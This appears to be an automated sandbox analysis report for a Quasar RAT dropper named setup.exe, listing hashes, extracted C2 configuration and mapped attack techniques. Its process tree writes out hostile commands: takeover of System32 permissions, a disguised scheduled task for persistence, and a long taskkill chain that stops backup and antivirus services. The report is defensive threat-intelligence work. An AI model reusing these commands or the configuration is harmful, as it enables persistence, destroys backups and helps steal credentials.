quasar | ee41b124b3a612f8c9a0a2438c53911a96eda7a95e080229af9d8fb4f8190413

Analysis

max time kernel
602s
max time network
605s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
02-10-2023 13:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup.exe
Size

41.6MB
MD5

367508dc504f59a05096555a60d9359e
SHA1

044a9b8abf7abd7484e18922ac55d3294dc6cc22
SHA256

ee41b124b3a612f8c9a0a2438c53911a96eda7a95e080229af9d8fb4f8190413
SHA512

c027877e94da69d0b951fb685d7b1797d28290c8240b746ae26be4880d82a8f2baa0fa0c39ac87abd7ce5ddf90daff449cf62d79d65259d4019792985ad7b057
SSDEEP

393216:L/jkxiIE7YoPQtsTTp7Lk3meBcGfd0vYM2krlFk1mX1eq44:rjke7rPQts/RLaT5F0vYvXFg

Score

10^/10

quasar user bootkit collection discovery evasion exploit persistence pyinstaller ransomware spyware stealer trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
1

Extracted

Family

quasar

Version

1.4.1

Botnet

user

192.168.0.13:3440

elpepemanca.ddns.net:3440

Mutex

5950a87d-00d0-4fc0-a953-61143318e6d1

Attributes

encryption_key
1A866C514D7B8C5F02AAA72B847C1F305295B74C
install_name
Windows.exe
log_directory
Logs
reconnect_delay
1
startup_key
Discord.exe
subdirectory
System

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 5 IoCs

resource	yara_rule
behavioral1/memory/3672-1-0x0000000000940000-0x00000000032DA000-memory.dmp	family_quasar
behavioral1/files/0x000700000002332e-391.dat	family_quasar
behavioral1/memory/3308-452-0x0000000000D10000-0x0000000001034000-memory.dmp	family_quasar
behavioral1/files/0x000700000002332e-407.dat	family_quasar
behavioral1/files/0x000700000002332e-406.dat	family_quasar

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Disables Task Manager via registry modification
evasion

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	setup.exe

Modifies Windows Firewall 1 TTPs 5 IoCs

evasion

Windows Service

T1543.003

pid	Process
3900	netsh.exe
4584	netsh.exe
3320	netsh.exe
3716	netsh.exe
1720	netsh.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
3372	takeown.exe
744	icacls.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	svchost.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exp.exe	setup.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exp.exe	setup.exe

Executes dropped EXE 10 IoCs

pid	Process
3656	lm.exe
2784	mbr.exe
3608	svchost.exe
4972	pass.exe
3760	steal.exe
3308	server.exe
1032	discord.exe
5424	steal.exe
5872	LaZagne.exe
5220	LaZagne.exe

Loads dropped DLL 64 IoCs

pid	Process
3656	lm.exe
3656	lm.exe
3656	lm.exe
3672	setup.exe
3672	setup.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5220	LaZagne.exe
5220	LaZagne.exe
5220	LaZagne.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5424	steal.exe
5220	LaZagne.exe
5220	LaZagne.exe
5220	LaZagne.exe
5220	LaZagne.exe
5220	LaZagne.exe
5220	LaZagne.exe
5220	LaZagne.exe
5220	LaZagne.exe
5220	LaZagne.exe
5220	LaZagne.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
744	icacls.exe
3372	takeown.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	LaZagne.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\mbr.exe"	mbr.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-2890696111-2332180956-3312704074-1000\desktop.ini	setup.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
172	api.ipify.org
176	api.ipify.org
147	api.ipify.org
149	api.ipify.org
164	api.ipify.org

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	lm.exe
File opened for modification	\??\PhysicalDrive0	mbr.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\LogonUI.exe	svchost.exe

Detects Pyinstaller 4 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000600000002332d-380.dat	pyinstaller
behavioral1/files/0x000600000002332d-395.dat	pyinstaller
behavioral1/files/0x000600000002332d-409.dat	pyinstaller
behavioral1/files/0x000600000002332d-505.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2908	schtasks.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
5356	tasklist.exe

Kills process with taskkill 42 IoCs

evasion

pid	Process
4268	taskkill.exe
2536	taskkill.exe
3480	taskkill.exe
4308	taskkill.exe
3300	taskkill.exe
4240	taskkill.exe
3064	taskkill.exe
5364	taskkill.exe
6080	taskkill.exe
1172	taskkill.exe
4616	taskkill.exe
2096	taskkill.exe
5664	taskkill.exe
6052	taskkill.exe
5956	taskkill.exe
3136	taskkill.exe
2044	taskkill.exe
5316	taskkill.exe
5436	taskkill.exe
6012	taskkill.exe
4972	taskkill.exe
556	taskkill.exe
1200	taskkill.exe
4712	taskkill.exe
5696	taskkill.exe
5936	taskkill.exe
1664	taskkill.exe
1644	taskkill.exe
400	taskkill.exe
456	taskkill.exe
5260	taskkill.exe
5560	taskkill.exe
4796	taskkill.exe
6056	taskkill.exe
4792	taskkill.exe
5564	taskkill.exe
5516	taskkill.exe
5920	taskkill.exe
556	taskkill.exe
3604	taskkill.exe
3064	taskkill.exe
5820	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
3900	reg.exe
4672	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4308	powershell.exe
4308	powershell.exe
4972	pass.exe
4972	pass.exe
4972	pass.exe
3672	setup.exe
3672	setup.exe
1032	discord.exe
1032	discord.exe
3672	setup.exe
4308	powershell.exe
4308	powershell.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
1032	discord.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
5220	LaZagne.exe
5220	LaZagne.exe
3672	setup.exe
5220	LaZagne.exe
5220	LaZagne.exe
5220	LaZagne.exe
5220	LaZagne.exe
3672	setup.exe
3672	setup.exe
5220	LaZagne.exe
5220	LaZagne.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3672	setup.exe
Token: SeTakeOwnershipPrivilege	3372	takeown.exe
Token: SeDebugPrivilege	1664	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3604	taskkill.exe
Token: SeSecurityPrivilege	3604	taskkill.exe
Token: SeTakeOwnershipPrivilege	3604	taskkill.exe
Token: SeLoadDriverPrivilege	3604	taskkill.exe
Token: SeSystemProfilePrivilege	3604	taskkill.exe
Token: SeSystemtimePrivilege	3604	taskkill.exe
Token: SeProfSingleProcessPrivilege	3604	taskkill.exe
Token: SeIncBasePriorityPrivilege	3604	taskkill.exe
Token: SeCreatePagefilePrivilege	3604	taskkill.exe
Token: SeBackupPrivilege	3604	taskkill.exe
Token: SeRestorePrivilege	3604	taskkill.exe
Token: SeShutdownPrivilege	3604	taskkill.exe
Token: SeDebugPrivilege	3604	taskkill.exe
Token: SeSystemEnvironmentPrivilege	3604	taskkill.exe
Token: SeRemoteShutdownPrivilege	3604	taskkill.exe
Token: SeUndockPrivilege	3604	taskkill.exe
Token: SeManageVolumePrivilege	3604	taskkill.exe
Token: 33	3604	taskkill.exe
Token: 34	3604	taskkill.exe
Token: 35	3604	taskkill.exe
Token: 36	3604	taskkill.exe
Token: SeDebugPrivilege	1644	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3604	taskkill.exe
Token: SeSecurityPrivilege	3604	taskkill.exe
Token: SeTakeOwnershipPrivilege	3604	taskkill.exe
Token: SeLoadDriverPrivilege	3604	taskkill.exe
Token: SeSystemProfilePrivilege	3604	taskkill.exe
Token: SeSystemtimePrivilege	3604	taskkill.exe
Token: SeProfSingleProcessPrivilege	3604	taskkill.exe
Token: SeIncBasePriorityPrivilege	3604	taskkill.exe
Token: SeCreatePagefilePrivilege	3604	taskkill.exe
Token: SeBackupPrivilege	3604	taskkill.exe
Token: SeRestorePrivilege	3604	taskkill.exe
Token: SeShutdownPrivilege	3604	taskkill.exe
Token: SeDebugPrivilege	3604	taskkill.exe
Token: SeSystemEnvironmentPrivilege	3604	taskkill.exe
Token: SeRemoteShutdownPrivilege	3604	taskkill.exe
Token: SeUndockPrivilege	3604	taskkill.exe
Token: SeManageVolumePrivilege	3604	taskkill.exe
Token: 33	3604	taskkill.exe
Token: 34	3604	taskkill.exe
Token: 35	3604	taskkill.exe
Token: 36	3604	taskkill.exe
Token: SeDebugPrivilege	4308	powershell.exe
Token: SeBackupPrivilege	812	vssvc.exe
Token: SeRestorePrivilege	812	vssvc.exe
Token: SeAuditPrivilege	812	vssvc.exe
Token: SeDebugPrivilege	3300	taskkill.exe
Token: SeDebugPrivilege	1172	taskkill.exe
Token: SeDebugPrivilege	400	taskkill.exe
Token: SeDebugPrivilege	3136	taskkill.exe
Token: SeDebugPrivilege	556	taskkill.exe
Token: SeDebugPrivilege	4796	taskkill.exe
Token: SeDebugPrivilege	4972	pass.exe
Token: SeDebugPrivilege	3604	RuntimeBroker.exe
Token: SeDebugPrivilege	2044	taskkill.exe
Token: SeDebugPrivilege	456	taskkill.exe
Token: SeDebugPrivilege	4240	taskkill.exe
Token: SeDebugPrivilege	4616	taskkill.exe
Token: SeDebugPrivilege	556	taskkill.exe
Token: SeDebugPrivilege	4308	powershell.exe

Suspicious use of FindShellTrayWindow 52 IoCs

pid	Process
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe
3672	setup.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3308	server.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3672 wrote to memory of 2244	3672	setup.exe	88
PID 3672 wrote to memory of 2244	3672	setup.exe	88
PID 3672 wrote to memory of 2244	3672	setup.exe	88
PID 3672 wrote to memory of 2428	3672	setup.exe	90
PID 3672 wrote to memory of 2428	3672	setup.exe	90
PID 3672 wrote to memory of 2428	3672	setup.exe	90
PID 2428 wrote to memory of 3656	2428	cmd.exe	92
PID 2428 wrote to memory of 3656	2428	cmd.exe	92
PID 2428 wrote to memory of 3656	2428	cmd.exe	92
PID 3672 wrote to memory of 2784	3672	setup.exe	94
PID 3672 wrote to memory of 2784	3672	setup.exe	94
PID 3672 wrote to memory of 2784	3672	setup.exe	94
PID 3672 wrote to memory of 3608	3672	setup.exe	95
PID 3672 wrote to memory of 3608	3672	setup.exe	95
PID 2784 wrote to memory of 2908	2784	mbr.exe	96
PID 2784 wrote to memory of 2908	2784	mbr.exe	96
PID 2784 wrote to memory of 2908	2784	mbr.exe	96
PID 3608 wrote to memory of 3568	3608	svchost.exe	100
PID 3608 wrote to memory of 3568	3608	svchost.exe	100
PID 3568 wrote to memory of 3372	3568	cmd.exe	101
PID 3568 wrote to memory of 3372	3568	cmd.exe	101
PID 3568 wrote to memory of 744	3568	cmd.exe	102
PID 3568 wrote to memory of 744	3568	cmd.exe	102
PID 3672 wrote to memory of 4808	3672	setup.exe	112
PID 3672 wrote to memory of 4808	3672	setup.exe	112
PID 3672 wrote to memory of 4808	3672	setup.exe	112
PID 3672 wrote to memory of 1448	3672	setup.exe	113
PID 3672 wrote to memory of 1448	3672	setup.exe	113
PID 3672 wrote to memory of 1448	3672	setup.exe	113
PID 3672 wrote to memory of 3792	3672	setup.exe	116
PID 3672 wrote to memory of 3792	3672	setup.exe	116
PID 3672 wrote to memory of 3792	3672	setup.exe	116
PID 1448 wrote to memory of 1720	1448	cmd.exe	120
PID 1448 wrote to memory of 1720	1448	cmd.exe	120
PID 1448 wrote to memory of 1720	1448	cmd.exe	120
PID 4808 wrote to memory of 1664	4808	cmd.exe	119
PID 4808 wrote to memory of 1664	4808	cmd.exe	119
PID 4808 wrote to memory of 1664	4808	cmd.exe	119
PID 3792 wrote to memory of 3604	3792	cmd.exe	136
PID 3792 wrote to memory of 3604	3792	cmd.exe	136
PID 3792 wrote to memory of 3604	3792	cmd.exe	136
PID 4808 wrote to memory of 1644	4808	cmd.exe	121
PID 4808 wrote to memory of 1644	4808	cmd.exe	121
PID 4808 wrote to memory of 1644	4808	cmd.exe	121
PID 4808 wrote to memory of 4308	4808	cmd.exe	145
PID 4808 wrote to memory of 4308	4808	cmd.exe	145
PID 4808 wrote to memory of 4308	4808	cmd.exe	145
PID 4808 wrote to memory of 3300	4808	cmd.exe	125
PID 4808 wrote to memory of 3300	4808	cmd.exe	125
PID 4808 wrote to memory of 3300	4808	cmd.exe	125
PID 4808 wrote to memory of 1172	4808	cmd.exe	127
PID 4808 wrote to memory of 1172	4808	cmd.exe	127
PID 4808 wrote to memory of 1172	4808	cmd.exe	127
PID 1448 wrote to memory of 3900	1448	cmd.exe	143
PID 1448 wrote to memory of 3900	1448	cmd.exe	143
PID 1448 wrote to memory of 3900	1448	cmd.exe	143
PID 4808 wrote to memory of 400	4808	cmd.exe	129
PID 4808 wrote to memory of 400	4808	cmd.exe	129
PID 4808 wrote to memory of 400	4808	cmd.exe	129
PID 4808 wrote to memory of 3136	4808	cmd.exe	130
PID 4808 wrote to memory of 3136	4808	cmd.exe	130
PID 4808 wrote to memory of 3136	4808	cmd.exe	130
PID 4808 wrote to memory of 556	4808	cmd.exe	146
PID 4808 wrote to memory of 556	4808	cmd.exe	146

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	LaZagne.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	LaZagne.exe

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
1⤵
- Drops file in Drivers directory
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3672
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Roaming\settings.bat
  2⤵
  PID:2244
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k cd %appdata% & lm.exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2428
- - C:\Users\Admin\AppData\Roaming\lm.exe
    lm.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Writes to the Master Boot Record (MBR)
    PID:3656
- C:\Users\Admin\AppData\Roaming\mbr.exe
  "C:\Users\Admin\AppData\Roaming\mbr.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of WriteProcessMemory
  PID:2784
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Roaming\mbr.exe"
    3⤵
    - Creates scheduled task(s)
    PID:2908
- C:\Users\Admin\AppData\Roaming\svchost.exe
  "C:\Users\Admin\AppData\Roaming\svchost.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:3608
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3568
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:3372
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32 /grant "Admin:F"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:744
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4808
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecAgentBrowser*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1664
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecDiveciMediaService*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1644
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecJobEngine*
    3⤵
    - Kills process with taskkill
    PID:4308
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecManagementService*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3300
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM vss*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1172
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sql*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:400
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM svc$*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3136
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM memtas*
    3⤵
    - Kills process with taskkill
    PID:556
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sophos*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4796
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM veeam*
    3⤵
    - Kills process with taskkill
    PID:4972
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM backup*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3604
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxVss*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2044
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxBlr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:456
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxFWD*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4240
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxCVD*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4616
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxCIMgr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:556
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM DefWatch*
    3⤵
    - Kills process with taskkill
    PID:3064
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM ccEvtMgr*
    3⤵
    - Kills process with taskkill
    PID:5316
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM SavRoam*
    3⤵
    - Kills process with taskkill
    PID:6056
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM RTVscan*
    3⤵
    - Kills process with taskkill
    PID:2096
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM QBFCService*
    3⤵
    - Kills process with taskkill
    PID:5664
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM Intuit.QuickBooks.FCS*
    3⤵
    - Kills process with taskkill
    PID:4792
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM YooBackup*
    3⤵
    - Kills process with taskkill
    PID:1200
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM YooIT*
    3⤵
    - Kills process with taskkill
    PID:5696
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM zhudongfangyu*
    3⤵
    - Kills process with taskkill
    PID:4712
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sophos*
    3⤵
    - Kills process with taskkill
    PID:3064
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM stc_raw_agent*
    3⤵
    - Kills process with taskkill
    PID:5564
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VSNAPVSS*
    3⤵
    - Kills process with taskkill
    PID:4268
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM QBCFMonitorService*
    3⤵
    - Kills process with taskkill
    PID:5820
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamTransportSvc*
    3⤵
    - Kills process with taskkill
    PID:5364
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamDeploymentService*
    3⤵
    - Kills process with taskkill
    PID:2536
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamNFSSvc*
    3⤵
    - Kills process with taskkill
    PID:5260
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM veeam*
    3⤵
    - Kills process with taskkill
    PID:3480
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM PDVFSService*
    3⤵
    - Kills process with taskkill
    PID:5560
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecVSSProvider*
    3⤵
    - Kills process with taskkill
    PID:5516
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecAgentAccelerator*
    3⤵
    - Kills process with taskkill
    PID:5920
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecRPCService*
    3⤵
    - Kills process with taskkill
    PID:5936
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM AcrSch2Svc*
    3⤵
    - Kills process with taskkill
    PID:6012
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM AcronisAgent*
    3⤵
    - Kills process with taskkill
    PID:5436
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM CASAD2DWebSvc*
    3⤵
    - Kills process with taskkill
    PID:6080
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM CAARCUpdateSvc*
    3⤵
    - Kills process with taskkill
    PID:6052
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM TeamViewer*
    3⤵
    - Kills process with taskkill
    PID:5956
- C:\Windows\SysWOW64\cmd.exe
